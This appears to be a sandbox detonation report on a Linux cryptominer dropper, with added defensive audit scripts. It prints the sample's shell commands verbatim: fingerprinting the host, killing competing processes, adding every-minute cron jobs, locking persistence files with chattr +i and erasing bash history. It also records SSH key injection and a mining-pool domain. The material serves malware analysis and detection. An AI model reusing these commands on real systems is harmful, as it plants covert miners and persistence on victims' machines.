| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index1/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index8/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/hugepages/hugepages-2048kB/nr_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/dax/devices | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/core_id | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/access0/initiators/read_bandwidth | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index0/physical_line_partition | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index4/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index5/shared_cpu_map | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/node/devices/node0/cpumap | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/devices/system/node/node0/hugepages/hugepages-2048kB/free_hugepages | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/topology/package_cpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cpufreq/base_frequency | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/level | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/size | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index2/number_of_sets | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /sys/bus/cpu/devices/cpu0/cache/index3/physical_line_partition | /tmp/.update/.x86_64 | N/A |
Process Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/ps | N/A |
| N/A | N/A | /usr/bin/ps | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/21/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/83/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/377/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/872/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/101/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/99/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/641/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1557/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1093/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/197/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/963/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/207/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/553/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/119/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1307/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1183/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/86/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/209/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1221/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/209/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/412/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/12/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/14/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/27/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1172/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/self/maps | /usr/bin/awk | N/A |
| File opened for reading | /proc/1140/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/78/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/417/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1038/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/16/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/638/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/991/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/90/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/845/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1342/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1427/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/767/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1163/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1637/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/453/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1362/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/209/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/222/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/409/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/114/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1124/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/213/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1013/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1245/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/767/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1013/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/5/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/1054/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/7/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/991/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/1162/stat | /usr/bin/ps | N/A |
| File opened for reading | /proc/6/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/1560/cmdline | /usr/bin/ps | N/A |
| File opened for reading | /proc/driver/nvidia/gpus | /tmp/.update/.x86_64 | N/A |
| File opened for reading | /proc/94/status | /usr/bin/ps | N/A |
| File opened for reading | /proc/415/cmdline | /usr/bin/ps | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/.cron | /bin/sh | N/A |
| File opened for modification | /tmp/.lock | /tmp/.update/.x86_64 | N/A |
Processes
/tmp/.update/.x86_64
[/tmp/.update/.x86_64]
/bin/sh
[sh -c echo "[$(hostname=$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo $hostname | awk {'print $1'} 2>/dev/null)$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print "-"$2'} 2>/dev/null)][$(whoami 2>/dev/null)][$(hostname 2>/dev/null)][$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][$(X=$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/$//' 2>/dev/null); if [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ $(echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $4'} 2>/dev/null) = 'CPU' ]; then echo $X 2>/dev/null | awk {'print $3'} 2>/dev/null; elif [ $(echo $X 2>/dev/null | awk {'print $1'} 2>/dev/null) = 'AMD' ]; then echo $X 2>/dev/null | awk {'print $2" "$3" "$4'} 2>/dev/null; else echo $X 2>/dev/null; fi)]"]
/usr/bin/hostname
[hostname -I]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print "-"$2}]
/usr/bin/head
[head -n 1]
/usr/bin/grep
[grep Port ]
/usr/bin/cat
[cat /etc/ssh/sshd_config]
/usr/bin/whoami
[whoami]
/usr/bin/hostname
[hostname]
/usr/bin/grep
[grep -c ^processor /proc/cpuinfo]
/usr/bin/sed
[sed -e s/$//]
/usr/bin/sed
[sed -e s/^ *//]
/usr/bin/cut
[cut -d: -f2]
/usr/bin/grep
[grep -m 1 model name /proc/cpuinfo]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $3}]
/usr/bin/awk
[awk {print $4}]
/usr/bin/awk
[awk {print $1}]
/usr/bin/awk
[awk {print $2" "$3" "$4}]
/bin/sh
[sh -c ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[$2]++ {print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/awk
[awk /[zZ]/ && !a[$2]++ {print $2}]
/usr/bin/ps
[ps -A -ostat,ppid]
/usr/bin/id
[id -u]
/usr/bin/grep
[grep -v grep]
/usr/bin/grep
[grep /etc/cron]
/usr/bin/ps
[ps x]
/bin/sh
[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi]
/usr/bin/id
[id -u]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -v /usr/sbin/httpd]
/usr/bin/grep
[grep -v -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
/bin/sh
[sh -c dir=`pwd 2>/dev/null`;rm -rf $dir/.cron 2>/dev/null;crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep -v '/tmp/.update/.x86_64' 2>/dev/null > .cron 2>/dev/null;echo '* * * * * '$dir/'/tmp/.update/.x86_64' >> .cron 2>/dev/null; if [ $(crontab -l 2>/dev/null | grep -v grep 2>/dev/null | grep '/tmp/.update/.x86_64$' 2>/dev/null | sort 2>/dev/null | uniq 2>/dev/null | wc -l 2>/dev/null) -eq '0' ]; then crontab $dir/.cron 2>/dev/null; fi;rm -rf $dir/.cron 2>/dev/null]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/usr/bin/grep
[grep -v /tmp/.update/.x86_64]
/usr/bin/grep
[grep -v grep]
/usr/bin/crontab
[crontab -l]
/usr/bin/wc
[wc -l]
/usr/bin/uniq
[uniq]
/usr/bin/sort
[sort]
/usr/bin/grep
[grep /tmp/.update/.x86_64$]
/usr/bin/grep
[grep -v grep]
/usr/bin/crontab
[crontab -l]
/usr/bin/crontab
[crontab /tmp/.update/.cron]
/usr/bin/rm
[rm -rf /tmp/.update/.cron]
/bin/sh
[sh -c if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u $myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*$' 2>/dev/null | awk '{if($3>30.0) print $2}' 2>/dev/null | while read procid; do kill -9 $procid 2>/dev/null; done fi fi]
/usr/bin/id
[id -u]
/usr/bin/wc
[wc -l]
/usr/bin/awk
[awk {if($3>30.0) print $2}]
/usr/bin/grep
[grep -- -bash[[:space:]]*$]
/usr/bin/grep
[grep -v grep]
/usr/bin/ps
[ps aux]
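The sh one-liners above show two traces this stage leaves that a defender can check from a shell: a per-user crontab entry whose command lives under /tmp/.update and runs every minute, and the dropper's habit of killing any process over 30% CPU except httpd and anything that looks like "-bash" (behavioral4 later on this page shows why: the payload copy is named "-bash"). The audit below is an added example, not code from the report or from the sample; it reads `crontab -l` and `ps aux` text on stdin, and the sample input at the bottom is constructed, not captured from the detonation.

```shell
#!/bin/sh
# Added example (not part of the sandbox report or the sample's own code):
# hunt for the user-crontab and process traces of the /tmp/.update/.x86_64 stage.
# Both audit functions read plain text on stdin, so they can be fed live
# `crontab -l` / `ps aux` output or, as below, constructed samples.

# audit_crontab: flag crontab lines that run every minute (the dropper's
# schedule), run from /tmp, /var/tmp or /dev/shm, or reference a hidden path
# component such as /tmp/.update. Comment and blank lines are skipped.
audit_crontab() {
    awk '
        /^[[:space:]]*#/ { next }
        NF == 0 { next }
        {
            why = ""
            if ($1 == "*" && $2 == "*" && $3 == "*" && $4 == "*" && $5 == "*")
                why = why " every-minute"
            if ($0 ~ /(^|[[:space:]])(\/tmp|\/var\/tmp|\/dev\/shm)\//)
                why = why " temp-dir"
            if ($0 ~ /\/\.[^\/[:space:]]+/)
                why = why " hidden-path"
            if (why != "")
                print "SUSPICIOUS_CRON [" substr(why, 2) "]: " $0
        }'
}

# audit_ps: flag `ps aux` rows whose command is "-bash" or "./-bash" at more
# than 30% CPU (the same threshold the dropper uses when it kills competitors,
# and the name it gives its own payload copy), plus any command started from
# a temp directory. Column 11 is COMMAND in `ps aux` output.
audit_ps() {
    awk '
        NR == 1 && $1 == "USER" { next }
        {
            cmd = $11; cpu = $3 + 0; why = ""
            if (cmd ~ /(^|\/)-bash$/ && cpu > 30)
                why = why " bash-masquerade-high-cpu"
            if (cmd ~ /^(\/tmp|\/var\/tmp|\/dev\/shm)\//)
                why = why " runs-from-temp"
            if (why != "")
                print "SUSPICIOUS_PROC [" substr(why, 2) "]: pid=" $2 " cpu=" $3 " cmd=" cmd
        }'
}

# Constructed sample input (not captured from the sandbox run).
sample_crontab() {
    printf '%s\n' \
        '# m h dom mon dow command' \
        '0 3 * * * /usr/bin/apt-get update' \
        '* * * * * /tmp/.update/.x86_64'
}
sample_ps() {
    printf '%s\n' \
        'USER       PID %CPU %MEM    VSZ   RSS TTY      STAT START   TIME COMMAND' \
        'root         1  0.0  0.1  27000  5000 ?        Ss   10:00   0:01 /sbin/init' \
        'user      1300  0.0  0.1  21000  4000 pts/0    Ss   10:05   0:00 -bash' \
        'user      1420 97.3  4.2 520000 80000 ?        Sl   10:06   5:12 ./-bash' \
        'root      1600 12.0  0.5  40000  9000 ?        S    10:07   0:30 /tmp/.update/.x86_64'
}

# On a live host: crontab -l | audit_crontab ; ps aux | audit_ps
sample_crontab | audit_crontab
sample_ps | audit_ps
```

A real interactive login shell also shows up as `-bash`, so on a live host confirm a hit by comparing `/proc/PID/exe` and `/proc/PID/cwd` with what the row claims; the sandbox copy runs from `/tmp/.systemd`, not from `/bin/bash`.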
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 8.8.8.8:53 | xmr-rx0.pwndns.pw | udp |
| US | 8.8.8.8:53 | xmr-rx0.pwndns.pw | udp |
| US | 137.184.223.223:80 | xmr-rx0.pwndns.pw | tcp |
Files
memory/1561-1-0x00007f1992cec000-0x00007f19933aad40-memory.dmp
/tmp/.update/.cron
| MD5 | d9da11a4b232a0003f710416ca81b6dd |
| SHA1 | 0ef01cf8be696a94f0c20223dc85f68cbc9038c1 |
| SHA256 | 1842334260d8c3c1b5278c7ffcb6e8bae750cafcdfe41d7c40e5faa9d26e72ee |
| SHA512 | b7f72c07c53aac4cea28e15d678ce70de3cea04928afa7b6f2e835fefaf40462879cfa7c941f0d0f47ac1b6ff50a6e54072d3f980f93279f0f86118ac98f4e32 |
/var/spool/cron/crontabs/tmp.NdujH4
| MD5 | dbbe047a01305ffcd7927d8a56c55eb1 |
| SHA1 | 1c7db54bf5706ef8df444e4d7535b6f32dd5f96d |
| SHA256 | 63d9f82a6a2fe9b6e17112df9bccf53a931add1ec27f01a47e7af9024dafe670 |
| SHA512 | 8e5263187070b7236bcbda6b18c9b2f2546b37135e019cd2011028d7d36cccf76d402cde20f9ff7510ffff20b7568d7899cdc9a375f348b3ebb9cc584c9ed1a0 |
Analysis: behavioral12
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-armhf-20240418-en
Max time kernel
0s
Command Line
Signatures
Processes
/tmp/.systemd/clean
[/tmp/.systemd/clean]
/bin/uname
[uname -m]
/bin/rm
[rm -rf systemd.d systemd.dir auth auto clean .run go ntpdate]
/bin/rm
[rm -rf /root/.bash_history]
Network
Files
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-mipsel-20240418-en
Max time kernel
3s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Attempts to change immutable files
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
| N/A | N/A | /usr/bin/chattr | N/A |
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /etc/cron.hourly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.monthly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.weekly/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.d/ntpdate | /usr/bin/tee | N/A |
| File opened for modification | /etc/cron.daily/ntpdate | /usr/bin/tee | N/A |
Modifies init.d
| Description | Indicator | Process | Target |
| File opened for modification | /etc/init.d/ntpdate | /usr/bin/tee | N/A |
Writes file to system bin folder
| Description | Indicator | Process | Target |
| File opened for modification | /sbin/lntpdate | /usr/bin/tee | N/A |
| File opened for modification | /sbin/entpdate | /usr/bin/tee | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
| File opened for reading | /proc/filesystems | /bin/mkdir | N/A |
| File opened for reading | /proc/filesystems | /bin/cp | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
| N/A | N/A | /bin/cp | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.systemd/systemd.dir | /tmp/.systemd/ntpdate | N/A |
Processes
/tmp/.systemd/ntpdate
[/tmp/.systemd/ntpdate]
/bin/uname
[uname -m]
/bin/cat
[cat systemd.dir]
/bin/mkdir
[mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly]
/usr/bin/chattr
[chattr -i -a /etc/cron.*/ntpdate /sbin/bcrond]
/bin/rm
[rm -rf /sbin/bcrond]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bcrond]
/usr/bin/tee
[tee -a /etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate]
/bin/chmod
[chmod +x /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr +i +a /etc/cron.daily/ntpdate /etc/cron.d/ntpdate /etc/cron.hourly/ntpdate /etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /sbin/bcrond]
/usr/bin/chattr
[chattr -a -i /sbin/bsysd]
/bin/rm
[rm -rf /sbin/bsysd]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/entpdate /sbin/bsysde]
/bin/rm
[rm -rf /sbin/bsysde]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysde]
/usr/bin/tee
[tee -a /sbin/entpdate]
/bin/chmod
[chmod +x /sbin/entpdate]
/usr/bin/chattr
[chattr +i +a /sbin/entpdate /sbin/bsysde]
/usr/bin/which
[which systemctl]
/usr/bin/chattr
[chattr -i -a /sbin/lntpdate /sbin/bsysdl]
/bin/rm
[rm -rf /sbin/bsysdl]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/bsysdl]
/usr/bin/tee
[tee -a /sbin/lntpdate]
/bin/chmod
[chmod +x /sbin/lntpdate]
/usr/bin/chattr
[chattr +i +a /sbin/lntpdate /sbin/bsysdl]
/usr/bin/which
[which update-rc.d]
/usr/bin/chattr
[chattr -i -a /etc/init.d/ntpdate /sbin/binitd]
/bin/rm
[rm -rf /sbin/binitd]
/bin/cp
[cp -f -r -- /tmp/.systemd/.mips /sbin/binitd]
/usr/bin/tee
[tee -a /etc/init.d/ntpdate]
/bin/chmod
[chmod +x /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/chattr
[chattr +i +a /etc/init.d/ntpdate /sbin/binitd]
/usr/bin/which
[which chkconfig]
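The installer above follows a fixed pattern for each persistence location: `chattr -i -a` on the target, `rm`, `cp` the MIPS payload in under a system-looking name (bcrond, bsysde, bsysdl, binitd), `tee -a` a launcher into the cron or init.d path, `chmod +x`, then `chattr +i +a` so a plain `rm` fails. The audit below is an added example, not code from the report or the sample; its path list is taken from the process list of this run, and the optional ROOT argument lets it be exercised on a constructed staging tree instead of the live filesystem.

```shell
#!/bin/sh
# Added example (not part of the sandbox report or the sample's own code):
# audit and remove the system-wide persistence installed by /tmp/.systemd/ntpdate.
# Paths come from the behavioral22 process list; ROOT="" means the live system.

NTPDATE_PATHS='/etc/cron.d/ntpdate /etc/cron.daily/ntpdate /etc/cron.hourly/ntpdate
/etc/cron.monthly/ntpdate /etc/cron.weekly/ntpdate /etc/init.d/ntpdate
/sbin/bcrond /sbin/bsysd /sbin/bsysde /sbin/bsysdl /sbin/binitd /sbin/entpdate /sbin/lntpdate'

# find_ntpdate_persistence [ROOT]: print every known path present under ROOT.
find_ntpdate_persistence() {
    root=${1:-}
    for p in $NTPDATE_PATHS; do
        [ -e "$root$p" ] && printf '%s\n' "$root$p"
    done
    return 0
}

# flagged_immutable: read `lsattr` output on stdin and print paths carrying the
# immutable (i) or append-only (a) flag, i.e. what `chattr +i +a` leaves behind.
# The first field must look like an lsattr flag string so error lines are ignored.
flagged_immutable() {
    awk '$1 ~ /^[-A-Za-z]+$/ && $1 ~ /[ia]/ { print $2 }'
}

# remove_ntpdate_persistence [ROOT]: clear the flags, then delete, which is the
# installer's own chattr/rm sequence applied in reverse to its output.
remove_ntpdate_persistence() {
    root=${1:-}
    find_ntpdate_persistence "$root" | while IFS= read -r f; do
        if command -v chattr >/dev/null 2>&1; then
            chattr -i -a "$f" 2>/dev/null || true
        fi
        rm -f "$f" && printf 'removed %s\n' "$f"
    done
    return 0
}

# build_sample_tree DIR: constructed staging tree standing in for an infected
# host; file contents are placeholders, not the real payload or launchers.
build_sample_tree() {
    mkdir -p "$1/etc/cron.d" "$1/etc/init.d" "$1/sbin"
    printf 'placeholder\n' > "$1/etc/cron.d/ntpdate"
    printf 'placeholder\n' > "$1/sbin/bcrond"
    printf 'placeholder\n' > "$1/sbin/entpdate"
}

# Demo on the constructed tree. On a live host run the functions with no ROOT
# and pipe `lsattr /etc/cron.*/ntpdate /etc/init.d/ntpdate /sbin/*ntpdate`
# into flagged_immutable first to see what needs its flags cleared.
stage=$(mktemp -d)
build_sample_tree "$stage"
find_ntpdate_persistence "$stage"
printf '%s\n' '----i-a-------e------- /etc/cron.d/ntpdate' \
              '--------------e------- /etc/hostname' | flagged_immutable
remove_ntpdate_persistence "$stage"
rm -rf "$stage"
```

The /sbin copies are byte-for-byte copies of `/tmp/.systemd/.mips` (the installer uses `cp -f -r`), so once one is recovered its hash will match the others and the staging file; removing only the cron and init.d launchers while leaving the /sbin binaries in place is the mistake the immutable flags are designed to provoke.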
Network
Files
/tmp/.systemd/systemd.dir
| MD5 | 1f3a48ead214b69a4e5bbcc12a732ddb |
| SHA1 | 3391a93f27a805c58de438e5a50267af13b619ab |
| SHA256 | 8ebe6ec5aee16e2d6ea3fe45a22e72ad8f936a83a7fc9e82591885bcb45e322c |
| SHA512 | 386b19da83f4b8416d17960a3c0832b38521a3396dbf99501dcf03811e17d1696b18db4131f66375889afc2c44d791dd62239a86d3ba0fa614b8547480a7381d |
/etc/cron.d/ntpdate
| MD5 | 755700d11d59e0daeb4f6452aee1ad5d |
| SHA1 | 6b1194921376bef9c7559629712772a11e78eaa4 |
| SHA256 | 1b311adac81faa8f9bf687306192ff84c2ee12a9337dd1051c55004ce39a2b00 |
| SHA512 | 446f3d05218fa12190dadd2f405345b9a5581221064314e8bce54b155c08ad9bdba17d15f6959e5eb987baaffa309cfb19bf92a1a944d580f66419060a44b2b7 |
/sbin/entpdate
| MD5 | 4aeb6335d69473274691f59dc2096cfe |
| SHA1 | 440755e42aa67c6ab3e636aeb1e8ec9463cd7ffc |
| SHA256 | 87095fcf498e832162baa13ecd28367155d8a1b5d02aee9ec1b60e149a871785 |
| SHA512 | 23b0ef7f02e090cae5b7c20f8b06f4c450e6e8ddc49f3df9c49d223aa2df36339bb92df56e4609240d5e2066ee328db0abebd38de4b3eef304e83e72f4f1886c |
/sbin/lntpdate
| MD5 | 3748e897538baafbc7b260b4d2fbc98f |
| SHA1 | 41d179e3cfc4c1820ea2c0fed0d50009564db79b |
| SHA256 | ebcbd097cd86e990591360d56f077f37de35fd6f4ce222c6d286f2f7e1024cc7 |
| SHA512 | 23519c47db8c96ed72be6833778013df9199bb6d243e989fca2a75dd55d2a5aca37228fc19b0e2537cb5e10a27d69815edc5b640c8e878d7e767559904eaccea |
/etc/init.d/ntpdate
| MD5 | bd99a962d94b5b4c32f8b7c8ca1f9ea9 |
| SHA1 | af33dc04d1f16e5ccceb2c0569b26e45bb65b32b |
| SHA256 | 64e489965b3914b15f92dadd851560e95287a40923b6cc93849e0758cdbf8b28 |
| SHA512 | fc2f81575bab833e76f070a45c3b9a1a32bb3c19084166c0beed3d03694d38295f6761af1599169f84a2c6f4b8c8bd8e1d8230796191de84dda52edd6899cdfa |
Analysis: behavioral25
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:39
Platform
debian9-armhf-20240729-en
Max time kernel
0s
Command Line
Signatures
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/.update/update.dir | /tmp/.update/.run | N/A |
| File opened for modification | /tmp/.update/.update | /tmp/.update/.run | N/A |
Processes
/tmp/.update/.run
[/tmp/.update/.run]
/bin/uname
[uname -m]
/bin/cat
[cat update.dir]
/tmp/.update/.armv7l
[./.armv7l -f]
Network
Files
/tmp/.update/update.dir
| MD5 | f162d09e078b8201089b7e20ea72f2bf |
| SHA1 | f7da8700cd21e201f62a17992d2ac15c09c447a1 |
| SHA256 | 2162d6f6fadf44bb1db38ea55ec80a7006c269061de5141bf9f4743ec9cd95fb |
| SHA512 | adb0481faeeb35926c8ba2bf2549e7b43dc40864ebfb8c40274d5021dfc3d87a8c2c2aa2996a28068c061ae13c404e85e870a23a67a709b4522134ce2be221cb |
/tmp/.update/.update
| MD5 | 144c1506f2865d421680f10562c63251 |
| SHA1 | a66615eec6e36d204170e45cd5bab05280f61a17 |
| SHA256 | c36f0bd30acee23f4eeabc05598d5365df341c0372a68c935c30ff94d379f032 |
| SHA512 | 2a2099e1a4fe4a86f1710934ec398d1dbdae1c0b9c04502af383318163d06d27f40dd9c6581a541ee11f36b743aaf127474ee244d224bfe5929f0c33c32eccd5 |
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-08 11:36
Reported
2024-11-08 11:40
Platform
debian9-armhf-20240611-en
Max time kernel
4s
Command Line
Signatures
Adds new SSH keys
| Description | Indicator | Process | Target |
| File opened for modification | /home/user/.ssh/authorized_keys | /tmp/.update/auth | N/A |
